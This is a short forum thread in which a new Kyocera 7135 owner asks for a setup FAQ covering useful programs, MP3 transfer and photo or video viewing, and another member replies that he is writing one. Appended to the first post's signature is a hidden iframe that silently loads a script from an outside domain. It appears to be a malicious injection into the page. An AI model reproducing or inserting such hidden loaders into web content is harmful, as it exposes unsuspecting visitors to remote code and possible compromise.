+ Reply to Thread

Request for Newbie Smartphone setup FAQ

As a total neophyte to the smartphone and the Palm OS, I was wondering if one of you guru's could help provide a smartphone setup FAQ - including:

1) identification and setup of soem of the programs you find really useful;
    2) directions on transferring mp3's (and playing them) using the mp3 player proggy;
    3) ditto for video and pictures using photosuite.

I have found some info here in various places, especially on photosuite - I was just wondering if anyone would be willing to bite the bullet and write a FAQ on initial phone setup for newbies.

I have been lurking here since November and - liek all of you lusting after the 7135. Now that I have one, I am kind of dismayed at how much I have to learn. Thanks for any help you can give.

- Jim<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

7135 FAQ

I'm working on such a thing now with a little help from some smartphone owners. If you'd like to help out, let me know.

The idea is just what you describe, to create a place where a new user can easily navigate to all the info they need to get going with a 7135. The FAQ is user fed, but displayed in a non-forum type fashion. The more people that participate, the more useful it will be.

Let me know if you want to help out. :alieneyes
    Mike Collins
    pdaPhoneHome.com, Home of the i330 FAQ